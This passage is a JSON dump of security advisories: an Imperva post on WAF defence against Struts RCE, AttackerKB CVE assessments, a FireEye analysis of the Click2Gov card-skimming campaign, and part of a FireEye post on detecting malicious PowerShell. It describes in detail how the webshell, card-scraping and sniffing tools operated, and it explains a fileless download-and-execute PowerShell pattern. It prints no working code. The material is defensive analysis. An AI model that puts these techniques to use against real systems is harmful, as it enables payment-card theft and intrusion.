feeds several times an hour. While this won\u2019t catch every instance of an attack, it is an excellent filter that will proactively block a large portion of the automated attacks that target web apps.\n\n### Anti-automation\n\nIP reputation isn\u2019t the only mechanism for stopping automated attacks. Both SecureSphere and Incapsula provide functionality for identifying and blocking bots, regardless of the bot\u2019s intent. Both use the same underlying technology to progressively profile a request to determine if the request is a human or a bot, and if a bot a good bot or a bad bot. Identifying and blocking requests from bad bots is another technique for scrubbing automated attacks targeting web apps.\n\n### Web Application Firewall Zero Day Protections\n\nReputation and anti-automation are extremely effective at filtering automated attacks from bad actors, but a careful attacker will be able to mask itself, especially when focusing upon a specific app or enterprise.\n\nHowever, to exploit an RCE vulnerability in every case the attacker needs to send the malicious code \u2013 the \u201cpayload\u201d \u2013 to the app in question. This payload will look wildly different from the typical content (e.g., an API call) submitted to an app. By learning what payloads are normally submitted via various form submissions and API calls, a solid WAF can prevent something like CVE-2017-9805 without knowing the vulnerability exists, and without ever seeing the payload before. The SecureSphere WAF uses machine learning to understand how an application normally behaves, and then uses it to identify and block anomalous requests.\n\nImperva zero day protections identified Apache Struts exploits almost immediately via a few different mechanisms:\n\n * Upon learning of a vulnerability, attackers will frequently \u201cspray and pray\u201d an attack against numerous apps, and various forms/APIs within an app. Given automation, its more cost effective for them to just broadly launch an attack than it is first determine if an app/API is even vulnerable. We saw this for CVE-2017-9805 almost immediately, identifying it a \u201cunknown content type for known URL\u201d. In English, this translates to \u201cnot only is this not normal, it isn\u2019t even content that this URL can process.\u201d These kinds of alerts are an early \u201ctell\u201d that something is afoot, and our research team uses them as both an early indicator, as well as to inform our ThreatRadar threat intelligence feeds.\n * If the app is susceptible to the vulnerability, a malicious payload will still not conform to normal application traffic. In the case of CVE-2017-9805, SecureSphere will identify an \u201cunknown parameter\u201d or \u201cparameter type violation.\u201d\n * In most cases, the payload is much larger/longer than a normal request. In these cases, a \u201cparameter length violation\u201d will surface.\n\n## The Role of App Security Domain Expertise\n\nWhat only someone who lives and breathes this stuff on a day-in/day-out basis knows is that any one of these violations by themselves isn\u2019t necessarily an attack. Policies built on evaluating any of this in isolation can result in a high rate of false positives. False positives are the bane of IT security\u2019s existence, _because when looking at a screen full of alerts, you don\u2019t know which ones are false and which aren\u2019t. _The net effect is ignoring them all.\n\nSecureSphere WAF has [patented capabilities](<https://www.imperva.com/Products/AdvancedTechnologies>) that evaluate the relationships between multiple violations. This ability to analyze seemingly independent violations coming from different layers of the app stack (e.g., network protocol, parameter length, IP reputation, etc.) together greatly enhances accuracy. This not only minimizes false positives, but more importantly provides the confidence to actually _block_ requests.\n\n## Manage Business Risk, Protect Against App Exploits\n\nAccording to the [2017 Verizon Data Breach Investigation Report](<http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/>) more successful breaches resulted from attacks on web apps than any other type of attack. This is telling since web app attacks are only number four in terms of incident frequency.\n\nAttackers realize that web app frameworks like Struts (and all frameworks have security issues) are particularly attractive targets. Since they are used for public facing web apps, they can\u2019t be hidden behind layers of network security. Their role is to accept inputs (web form parameters, API calls, etc.) and then process these inputs, which directly maps to particularly dangerous exploits like SQL injection and RCE. Since frameworks are widely adopted, attackers automate their attacks so they can cost effectively leverage their effort across thousands of websites.\n\nBusiness will roll out more application functionality. The cost savings and revenue generating opportunities from digital transformation pretty much guarantee we\u2019ll have more app surface area next year than this year. Learn more about how to use these capabilities to protect this ever growing surface area with Imperva SecureSphere [Web Application Firewall (WAF)](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>) and [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-18T20:33:25", "title": "Apache Struts, RCE and Managing App Risk", "type": "impervablog", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-09-18T20:33:25", "href": "https://www.imperva.com/blog/2017/09/apache-struts-rce-and-managing-app-risk/", "id": "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2023-06-23T17:28:07", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776", "CVE-2019-0230"], "modified": "2020-11-17T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:13:39", "description": "The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:52pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {}, "published": "2015-11-18T00:00:00", "type": "attackerkb", "title": "CVE-2015-4852", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852"], "modified": "2020-07-30T00:00:00", "id": "AKB:71A48C9F-C37B-4C1A-AD30-456EF1B66CF9", "href": "https://attackerkb.com/topics/UBKuPZwldv/cve-2015-4852", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-19T17:45:45", "description": "Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2010-12-14T00:00:00", "type": "attackerkb", "title": "CVE-2010-4344", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4344"], "modified": "2023-02-13T00:00:00", "id": "AKB:B894338F-1778-4FF3-B7C6-27DA4D47DE9A", "href": "https://attackerkb.com/topics/FnaFHkwt4s/cve-2010-4344", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2018-10-11T20:17:40", "description": "FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. [Click2Gov](<https://www.superion.com/public-administration/click2gov/>) is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement [confirming suspicious activity](<https://www.superion.com/ceo-response-to-reported-breach/>) had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign. Since June 2018, additional victims have been identified in public reporting. A review of public statements by these organizations appear to confirm compromises associated with Click2Gov.\n\nOn June 15, 2018, Superion released a statement describing their [proactive notification to affected customers](<https://www.superion.com/click2gov-update/>), work with a third-party forensic firm (not Mandiant), and deployment of patches to Click2Gov software and a related third-party component. Superion then concluded that there was no evidence that it is unsafe to make payments utilizing Click2Gov on hosted or secure on-premise networks with recommended patches and configurations.\n\nMandiant forensically analyzed compromised systems and recovered malware associated with this campaign, which provided insight into the capabilities of this new attacker. As of this publication, the discussed malware families have very low detection rates by antivirus solutions, as reported by VirusTotal.\n\n#### Attack Overview\n\nThe first stage of the campaign typically started with the attacker uploading a SJavaWebManage webshell to facilitate interaction with the compromised Click2Gov webserver. Through interaction with the webshell, the attacker enabled debug mode in a Click2Gov configuration file causing the application to write payment card information to plaintext log files. The attacker then uploaded a tool, which FireEye refers to as FIREALARM, to the webserver to parse these log files, retrieve the payment card information, and remove all log entries not containing error messages. Additionally, the attacker used another tool, SPOTLIGHT, to intercept payment card information from HTTP network traffic. The remainder of this blog post dives into the details of the attacker's tactics, techniques, and procedures (TTPs).\n\n#### SJavaWebManage Webshell\n\nIt is not known how the attacker compromised the Click2Gov webservers, but they likely employed an exploit targeting Oracle Web Logic such as CVE-2017-3248, CVE-2017-3506, or CVE-2017-10271, which would provide the capability to upload arbitrary files or achieve remote access. After exploiting the vulnerability, the attacker uploaded a variant of the [publicly available JavaServer Pages (JSP) webshell SJavaWebManage](<https://github.com/tennc/webshell/blob/master/jsp/SJavaWebManageV1.4.jsp>) to maintain persistence on the webserver. SJavaWebManage requires authentication to access four specific pages, as depicted in Figure 1, and will execute commands in the context of the Tomcat service, by default the Local System account.\n\n \nFigure 1: Sample SJavaWebManage interface\n\n * **EnvsInfo**: Displays information about the Java runtime, Tomcat version, and other information about the environment.\n * **FileManager**: Provides the ability to browse, upload, download (original or compressed), edit, delete, and timestomp files.\n * **CMDS**: Executes a command using cmd.exe (or /bin/sh if on a non-Windows system) and returns the response.\n * **DBManage**: Interacts with a database by connecting, displaying database metadata, and executing SQL commands.\n\nThe differences between the publicly available webshell and this variant include variable names that were changed to possibly inhibit detection, Chinese characters that were changed to English, references to SjavaWebManage that were deleted, and code to handle updates to the webshell being removed. Additionally, the variant identified during the campaign investigation included the ability to manipulate file timestamps on the server. This functionality is not present in the public version. The SJavaWebManage webshell provided the attacker a sufficient interface to easily interact with and manipulate the compromised hosts.\n\nThe attacker would then restart a module in DEBUG mode using the SJavaWebManage CMDS page after editing a Click2Gov XML configuration file. With the DEBUG logging option enabled, the Click2Gov module would log plaintext payment card data to the Click2Gov log files with naming convention Click2GovCX.logYYYY-MM-DD.\n\n#### FIREALARM\n\nUsing interactive commands within the webshell, the attacker uploaded and executed a datamining utility FireEye tracks as FIREALARM, which parses through Click2Gov log files to retrieve payment card data, format the data, and print it to the console.\n\nFIREALARM is a command line tool written in C/C++ that accepts three numbers as arguments; Year, Month, and Day, represented in a sample command line as: evil.exe 2018 09 01. From this example, FIREALARM would attempt to open and parse logs starting on 2018-09-01 until the present day. If the log files exists, FIREALARM copies the MAC (Modified, Accessed, Created) times to later timestomp the corresponding file back to original times. Each log file is then read line by line and parsed. FIREALARM searches each line for the following contents and parses the data:\n\n * medium.accountNumber\n * medium.cvv2\n * medium.expirationDate.year\n * medium.expirationDate.month\n * medium.firstName\n * medium.lastName\n * medium.middleInitial\n * medium.contact.address1\n * medium.contact.address2\n * medium.contact.city\n * medium.contact.state\n * medium.contact.zip.code\n\nThis data is formatted and printed to the console. The malware also searches for lines that contain the text ERROR -. If this string is found, the utility stores the contents in a temporary file named %WINDIR%\\temp\\THN1080.tmp. After searching every line in the Click2GovCX log file, the temporary file THN1080.tmp is copied to replace the respective Click2GovCX log file and the timestamps are replaced to the original, copied timestamps. The result is that FIREALARM prints payment card information to the console and removes the payment card data from each Click2GovCX log file, leaving only the error messages. Finally, the THN1080.tmp temporary file is deleted. This process is depicted in Figure 2.\n\n \nFigure 2: FIREALARM workflow\n\n 1. Attacker traverses Tor or other proxy and authenticates to SjavaWebManage.\n 2. Attacker launches cmd prompt via webshell.\n 3. Attacker runs FIREALARM with parameters.\n 4. FIREALARM verifies and iterates through log files, copies MAC times, parses and prints payment card data to the console, copies error messages to THN1080.tmp, overwrites the original log file and timestomps with orginal times.\n 5. THN1080.tmp is deleted.\n\n#### SPOTLIGHT\n\nLater, during attacker access to the compromised system, the attacker used the webshell to upload a network sniffer FireEye tracks as SPOTLIGHT. This tool offered the attacker better persistence to the host and continuous collection of payment card data, ensuring the mined data would not be lost if Click2GovCX log files were deleted by an administrator. SPOTLIGHT is also written in C/C++ and may be installed by command line arguments or run as a service. When run as a service, its tasks include ensuring that two JSP files exist, and monitoring and logging network traffic for specific HTTP POST request contents.\n\nSPOTLIGHT accepts two command line arguments:\n\n * gplcsvc.exe -i Creates a new service named gplcsvc with the display name Group Policy Service\n * gplcsvc.exe -u Stops and deletes the service named gplcsvc\n\nUpon installation, SPOTLIGHT will monitor two paths on the infected host every hour:\n\n 1. C:\\bea\\c2gdomain\\applications\\Click2GovCX\\scripts\\validator.jsp\n 2. C:\\bea\\c2gdomain\\applications\\ePortalLocalService\\axis2-web\\RightFrame.jsp\n\nIf either file does not exist, the malware Base64 decodes an embedded SJavaWebManage webshell and writes the same file to either path. This is the same webshell installed by the attacker during the initial compromise.\n\nAdditionally, SPOTLIGHT starts a socket listener to inspect IPv4 TCP traffic on port 80 and 7101. According to a Superion installation checklist, TCP port 7101 is used for application resolution from the internal network to the Click2Gov webserver. As long as the connection contents do not begin with GET /, the malware begins saving a buffer of received packets. The malware continues saving packet contents to an internal buffer until one of two conditions occurs \u2013 the buffer exceeds the size 102399 or the packet contents begin with the string POST /OnePoint/services/OnePointService. If either of these two conditions occur, the internal buffer data is searched for the following tags:\n\n * <op:AccountNum>\n * <op:CSC>\n * <op:ExpDate>\n * <op:FirstName>\n * <op:LastName>\n * <op:MInitial>\n * <op:Street1>\n * <op:Street2>\n * <op:City>\n * <op:State>\n * <op:PostalCode>\n\nThe contents between the tags are extracted and formatted with a `|`, which is used as a separator character. The formatted data is then Base64 encoded and appended to a log file at the hard-coded file path: c:\\windows\\temp\\opt.log. The attacker then used SJavaWebManage to exfiltrate the Base64 encoded log file containing payment card data. FireEye has not identified any manipulation of a compromised host\u2019s SSL configuration settings or redirection of SSL traffic to an unencrypted port. This process is depicted in Figure 3.\n\n \nFigure 3: SPOTLIGHT workflow\n\n 1. SPOTLIGHT verifies webshell file on an hourly basis, writing SJavaWebManage if missing.\n 2. SPOTLIGHT inspects IPv4 TCP traffic on port 80 or 7101, saving a buffer of received packets.\n 3. A user accesses Click2Gov module to make a payment.\n 4. SPOTLIGHT parses packets for payment card data, Base64 encodes and writes to opt.log.\n 5. Attacker traverses Tor or other proxy and authenticates to SJavaWebManage and launches File Manager.\n 6. Attacker exfiltrates opt.log file.\n\n#### Attribution\n\nBased on the available campaign information, the attacker doesn\u2019t align with any financially motivated threat groups currently tracked by FireEye. The attacker\u2019s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communications protocols demonstrates an advanced knowledge of the Click2Gov application. Given the manner in which underground forums and marketplaces function, it is possible that tool development could have been contracted to third parties and remote access to compromised systems could have been achieved by one entity and sold to another. There is much left to be uncovered about this attacker. \n\nWhile it is also possible the attack was conducted by a single individual, FireEye assesses, with moderate confidence, that a team was likely involved in this campaign based on the following requisite skillsets:\n\n * Ability to locate Click2Gov installations and identify exploitable vulnerabilities.\n * Ability to craft or reuse an exploit to penetrate the target organization\u2019s network environment.\n * Basic JSP programming skills.\n * Advanced knowledge of Click2Gov payment processes and software sufficient to develop moderately sophisticated malware.\n * Proficient C/C++ programming skills.\n * General awareness of operational security.\n * Ability to monetize stolen payment card information.\n\n#### Conclusion\n\nIn addition to a regimented patch management program, FireEye recommends that organizations consider implementing a file integrity monitoring solution to monitor the static content and code that generates dynamic content on e-commerce webservers for unexpected modifications. Another best practice is to ensure any web service accounts run at least privilege.\n\nAlthough the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware exploiting Click2Gov installations, achieving moderate success. Although it may transpire in a new form, FireEye anticipates this threat actor will continue to conduct interactive and financially motivated attacks.\n\n#### Detection\n\nFireEye\u2019s Adversary Pursuit Team from Technical Operations & Reverse Engineering \u2013 Advanced Practices works jointly with Mandiant Consulting and FireEye Labs Advanced Reverse Engineering (FLARE) during investigations assessed as directly supporting a nation-state or financial gains intrusions targeting organizations and involving interactive and focused efforts. The synergy of this relationship allows FireEye to rapidly identify new activity associated with currently tracked threat groups, as well as new threat actors, advanced malware, or TTPs leveraged by threat groups, and quickly mitigate them across the FireEye enterprise.\n\nFireEye detects the malware documented in this blog post as the following:\n\n * FE_Tool_Win32_FIREALARM_1\n * FE_Trojan_Win64_SPOTLIGHT_1\n * FE_Webshell_JSP_SJavaWebManage_1\n * Webshell.JSP.SJavaWebManage\n\n#### Indicators of Compromise (MD5)\n\n_SJavaWebManage_\n\n * 91eaca79943c972cb2ca7ee0e462922c \n * 80f8a487314a9573ab7f9cb232ab1642 \n * cc155b8cd261a6ed33f264e710ce300e (Publicly available version)\n\n_FIREALARM_\n\n * e2c2d8bad36ac3e446797c485ce8b394\n\n_SPOTLIGHT_\n\n * d70068de37d39a7a01699c99cdb7fa2b\n * 1300d1f87b73d953e20e25fdf8373c85\n * 3bca4c659138e769157f49942824b61f\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-19T10:00:00", "type": "fireeye", "title": "Click It Up: Targeting Local Government Payment Portals", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3506", "CVE-2017-3248", "CVE-2017-10271"], "modified": "2018-09-19T10:00:00", "id": "FIREEYE:C097B41677EDE5F95DB4B84AD6726751", "href": "https://www.fireeye.com/blog/threat-research/2018/09/click-it-up-targeting-local-government-payment-portals.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:18:22", "description": "#### Introduction****\n\nCyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to [install backdoors](<https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html>), [execute malicious code](<https://www.csoonline.com/article/3227046/malware/what-is-a-fileless-attack-how-hackers-invade-systems-without-installing-software.html>), and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.\n\nIn this post you will learn:\n\n * Why malicious PowerShell can be challenging to detect with a traditional \u201csignature-based\u201d or \u201crule-based\u201d detection engine.\n * How Natural Language Processing (NLP) can be applied to tackle this challenge.\n * How our NLP model detects malicious PowerShell commands, even if obfuscated.\n * The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.\n\n#### Background****\n\nPowerShell is one of the most [popular tools](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).\n\n \nFigure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 \u2013 blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series\n\nFireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the [tactics, techniques and procedures (TTPs) used in PowerShell attacks](<https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf>), as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to [improve PowerShell logging](<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>), which gives greater visibility into potential attacker activity. More recently, our in-depth report on [APT32](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.\n\n \nFigure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain\n\nLet\u2019s take a deep dive into an example of a malicious PowerShell command (Figure 3).\n\n \nFigure 3: Example of a malicious PowerShell command\n\nThe following is a quick explanation of the [arguments](<https://docs.microsoft.com/en-us/powershell/scripting/powershell-scripting?view=powershell-6>):\n\n * -NoProfile \u2013 indicates that the current user\u2019s profile setup script should not be executed when the PowerShell engine starts.\n * -NonI \u2013 shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.\n * -W Hidden \u2013 shorthand for \u201c-WindowStyle Hidden\u201d, which indicates that the PowerShell session window should be started in a hidden manner.\n * -Exec Bypass \u2013 shorthand for \u201c-ExecutionPolicy Bypass\u201d, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn\u2019t meant to be a security boundary.\n * -encodedcommand \u2013 indicates the following chunk of text is a base64 encoded command.\n\nWhat is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.\n\n \nFigure 4: The decoded command for the aforementioned example\n\nInterestingly, the decoded command unveils a stealthy fileless network access and remote content execution!\n\n * _IEX_ is an alias for the _Invoke-Expression_ cmdlet that will execute the command provided on the local machine.\n * **The _new-object_** cmdlet creates an instance of a .NET Framework or COM object, here a _net.webclient_ object.\n * The _downloadstring_ will download the contents from <url> into a memory buffer (which in turn _IEX_ will execute).\n\nIt\u2019s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting [CVE-2017-10271 to deliver a cryptocurrency miner](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>). This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.\n\nThere are several reasons why adversaries prefer PowerShell:\n\n 1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.\n 2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.\n 3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.\n\nAdditionally, from an economics perspective:\n\n * Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with [open source obfuscation tools](<https://www.fireeye.com/blog/threat-research/2017/07/revoke-obfuscation-powershell.html>).\n * Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.\n\nNext, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.\n\n#### Natural Language Processing for Detecting Malicious PowerShell****\n\nCan we use machine learning to predict if a PowerShell command is malicious?\n\nOne advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.\n\nAfter we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.\n\nOne of the technical challenges we tackled was** **synonym, a problem studied in linguistics. For instance, \u201cNOL\u201d, \u201cNOLO\u201d, and \u201cNOLOGO\u201d have identical semantics in PowerShell syntax. In NLP, a [stemming](<https://en.wikipedia.org/wiki/Stemming>) algorithm will reduce the word to its original form, such as \u201cInnovating\u201d being stemmed to \u201cInnovate\u201d.\n\nWe created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as [trie](<https://en.wikipedia.org/wiki/Trie>), as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.\n\n \nFigure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)\n\nThe overall NLP pipeline we developed is captured in the following table:\n\nNLP Key Modules\n\n| \n\nFunctionality \n \n---|--- \n \nDecoder\n\n| \n\nDetect and decode any encoded text \n \nNamed Entity Recognition (NER)\n\n| \n\nDetect and recognize any entities such as IP, URL, Email, Registry key, etc. \n \nTokenizer\n\n| \n\nTokenize the PowerShell command into a list of tokens \n \nStemmer\n\n| \n\nStem tokens into semantically identical token, uses trie \n \nVocabulary Vectorizer\n\n| \n\nVectorize the list of tokens into machine learning friendly format \n \nSupervised classifier\n\n| \n\nBinary classification algorithms:\n\n * Kernel Support Vector Machine\n * Gradient Boosted Trees\n * Deep Neural Networks \n \nReasoning\n\n| \n\nThe explanation of why the prediction was made. Enables analysts to validate predications. \n \nThe following are the key steps when streaming the aforementioned example through the NLP pipeline:\n\n * Detect and decode the Base64 commands, if any\n * Recognize entities using Named Entity Recognition (NER), such as the <URL>\n * Tokenize the entire text, including both clear text and obfuscated commands\n * Stem each token, and vectorize them based on the vocabulary\n * Predict the malicious probability using the supervised learning model\n\n \nFigure 6: NLP pipeline that predicts the malicious probability of a PowerShell command\n\nMore importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.\n\n \nFigure 7: End-to-end machine learning production pipeline for PowerShell machine learning\n\n#### Value Validated in the Field****\n\nWe successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell 